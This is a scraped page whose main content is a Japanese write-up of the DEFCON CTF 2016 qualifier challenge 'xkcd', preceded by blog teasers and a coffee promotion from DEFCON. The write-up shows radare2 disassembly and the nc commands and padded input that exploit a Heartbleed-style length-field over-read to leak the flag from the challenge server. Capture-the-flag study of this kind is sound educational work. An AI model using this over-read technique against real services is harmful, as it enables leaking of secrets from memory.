Dec 13, 2016
@jollieyasmin
seen from India
seen from China
seen from Bulgaria
seen from United States
seen from Israel
seen from Israel
seen from Israel
seen from Yemen
seen from Israel
seen from Indonesia
seen from Germany
seen from Kazakhstan
seen from Türkiye
seen from China
seen from Italy
seen from Indonesia
seen from China
seen from Serbia
seen from United States
seen from United States
@jollieyasmin
@sugarcuttom
At this year’s Black Hat & Def Con there were a few firsts for me, and it was probably one of the best experiences I’ve had at these…
Short blog post on my bhusa2016 & defcon2016 experience
Melissa Archer 'Cray' and her good friend 'Shznakl' went to DEFCON to Promote Hacker's Brew. Hacker's Brew a cold brew coffee made with Superfood Ingredients that calms the mind and boosts energy, focus ability to help individual's get stuff done. Over the course of the weekend they we're able to highly get word spread about this awesome new brand of cold brew through Promoting it at targeted Hacking Conferences. Those like DEFCON, as well as through the social pages on Facebook, Twitter & Instagram. Hacker's Brew is highly recommended. 'Nikias Bassen 'wrote via Twitter -" Thank's for the treat HackersBrew! " 'Kim Brown' wrote via Twitter -" Check out HackersBrew yummy just look at Landon's face duosec #defcon2016 " 'Landon Greer ' wrote via Twitter -" Thanks for the energy boost! HackersBrew " 'Justin Williams' wrote via Twitter -" Just landed in DEN. Can't forget to say thanks to MelissaArcher for the delicious HackersBrew!! #defcon " and 'Antriksh' wrote via Twitter - " I love your stuff HackersBrew , do let us know when you start shipping it outside of the US . Great #coffee " Hacker's Brew ended the event via Twitter writing -"Annnnnd the last #DEFCON bottle of brew goes to?! hackthethings Street team killing it! @_melissaarcher @shznakl " For more info on Hacker's Brew the cold brew go to HackersBrew.com #DEFCON2016
xkcd writeup (DEFCON CTF 2016 QUAL)
xkcd
xkcd_be4bf26fcb93f9ab8aa193efaad31c3b.quals.shallweplayaga.me:1354 Might want to read that comic as well... 1354
とりあえずいつもの。
$~/defcon2016/xkcd# file xkcd xkcd: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, not stripped $~/defcon2016/xkcd# checksec.sh --file xkcd RELRO STACK CANARY NX PIE RPATH RUNPATH FILE No RELRO No canary found NX enabled No PIE No RPATH No RUNPATH xkcd
PIEが無いのは助かるなぁ。 NXがあるってことは、シェルコード系の可能性は低いかな。まぁ、実行してみるか。
$~/defcon2016/xkcd# ./xkcd Could not open the flag. $~/defcon2016/xkcd# echo foobar > flag $~/defcon2016/xkcd# ./xkcd foobar MALFORMED REQUEST
ファイルが開けないとな。適当にflagとかいうファイルを作ってみるとうまいこといった。でも、プロトコルが適切でないため、リジェクトされたっぽいな。じゃ、ディスアセンブリしたりしながら、それを探すか。今回は「radare2」を利用してみよう。
$~/defcon2016/xkcd# r2 ./xkcd [0x00400e3e]> aa [0x00400e3e]> pdf@main / (fcn) fcn.00400f5e 537 ... | 0x00400fb9 bee47d4800 mov esi, 0x487de4 | 0x00400fbe bfe67d4800 mov edi, str.flag | 0x00400fc3 e8b86d0000 call sym.fopen64 | sym.fopen64() ; sym._IO_fopen64 | 0x00400fc8 488945e8 mov [rbp-0x18], rax | 0x00400fcc 48837de800 cmp qword [rbp-0x18], 0x0 | ,=< 0x00400fd1 7514 jnz 0x400fe7 | | 0x00400fd3 bfeb7d4800 mov edi, 0x487deb | | 0x00400fd8 e883720000 call sym._IO_puts | | sym._IO_puts() ; sym.puts | | 0x00400fdd b8ffffffff mov eax, 0xffffffff | ,==< 0x00400fe2 e990010000 jmp fcn.00401177 | |`-> 0x00400fe7 488b45e8 mov rax, [rbp-0x18] | | 0x00400feb 4889c1 mov rcx, rax | | 0x00400fee ba00010000 mov edx, 0x100 | | 0x00400ff3 be01000000 mov esi, 0x1 | | 0x00400ff8 bf40756b00 mov edi, 0x6b7540 | | 0x00400ffd e88e6d0000 call sym.fread | | sym.fread() ; sym._IO_fread ... [0x00400e3e]> [email protected] flag [0x00400e3e]> ps @0x487deb Could not open the flag.
「0x00400fbe、0x00400fc3」あたりでファイル「flag」を開き、「0x6b7540」に読み込んでいるようだ。ということはうまいことそのメモリを読み込む感じになりそうかな。引き続き、例のプロトコルが何かを調べよう。
[0x00400e3e]> pdf@main~strtok | | fcn.004196a0() ; sym.strtok | | fcn.004196a0() ; sym.strtok | | fcn.004196a0() ; sym.strtok | | fcn.004196a0() ; sym.strtok | | fcn.004196a0() ; sym.strtok
この部分を見る限り、特定の区切り文字で区切ってそうだなーってことがわかるので、ちょっとずつデバッガを使いながら調べることにした。strtokのあたりにブレークポイントをつけつつデバッグすると、プロトコルが次の通りであることがわかった。
SERVER, ARE YOU STILL THERE? IF SO, REPLY "表示する文字" ([文字数] LETTERS)
実際にこのプロトコルで何かを送ってみるとこうなる。
$~/defcon2016/xkcd# ./xkcd SERVER, ARE YOU STILL THERE? IF SO, REPLY "foobar" (6 LETTERS) foobar ... $~/defcon2016/xkcd# ./xkcd SERVER, ARE YOU STILL THERE? IF SO, REPLY "foobar" (10 LETTERS) NICE TRY
適切なプロトコルに則って「表示する文字」を与えてやると、それを返してくるようだ。さらに、「文字数」が「表示する文字」よりも多いとき、「NICE TRY」と表示されることもわかった。この辺をディスアセンブルして、よく見てみるとしよう。
| | 0x004010db bf40736b00 mov edi, sym.globals | | 0x004010e0 e8fbeb0100 call fcn.0041fce0 | | fcn.0041fce0() ; sym.memcpy ... [0x00400e3e]> is~globals addr=0x006b7340 off=0x002b7340 ord=1807 fwd=NONE sz=768 bind=GLOBAL type=OBJECT name=globals ... | | 0x00401145 bf40736b00 mov edi, sym.globals | | 0x0040114a e831610100 call sym.strlen | | sym.strlen() | | 0x0040114f 4839c3 cmp rbx, rax | ,=====< 0x00401152 7614 jbe 0x401168 | | | 0x00401154 bf547e4800 mov edi, str.NICETRY | | | 0x00401159 e802710000 call sym._IO_puts | | | sym._IO_puts() ; sym.puts | | | 0x0040115e bfffffffff mov edi, 0xffffffff | | | 0x00401163 e8d85a0000 call sym.exit | | | sym.exit() | `-----> 0x00401168 bf40736b00 mov edi, sym.globals | | 0x0040116d e8ee700000 call sym._IO_puts | | sym._IO_puts() ; sym.puts
まず「表示する文字」の扱いに注目すると、それを「sym.globals」すなわち「0x6b7340」に「memcpy」で格納していることがわかる(なんか引数切れちゃってるけど)。そこに対する「strlen」の戻り値 と例のプロトコルで指定した「文字数」を比較して「表示する文字」を表示してくれるようだ。 んん? たしか、先ほどflagを読み込んだメモリの位置が「0x6b7540」だったはずだ。今操作できるメモリの位置は「0x6b7340」なので、その差512バイトを埋めてやれば一見長い文字列のようにならないだろか。memcpy使ってるし。で、512よりも多い数を「文字数」として与えればflagが得られるんじゃないか。
$:~/defcon2016/xkcd# nc xkcd_be4bf26fcb93f9ab8aa193efaad31c3b.quals.shallweplayaga.me 1354 SERVER, ARE YOU STILL THERE? IF SO, REPLY "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" (515 LETTERS) aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaThe
おし、狙ったものが出てきたぞ。あとは長さを調整してやれば良さげだ。
$~/defcon2016/xkcd# nc xkcd_be4bf26fcb93f9ab8aa193efaad31c3b.quals.shallweplayaga.me 1354 SERVER, ARE YOU STILL THERE? IF SO, REPLY "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" (542 LETTERS) NICE TRY $~/defcon2016/xkcd# nc xkcd_be4bf26fcb93f9ab8aa193efaad31c3b.quals.shallweplayaga.me 1354 SERVER, ARE YOU STILL THERE? IF SO, REPLY "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" (541 LETTERS) aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaThe flag is: bl33ding h34rt5
The flag is: bl33ding h34rt5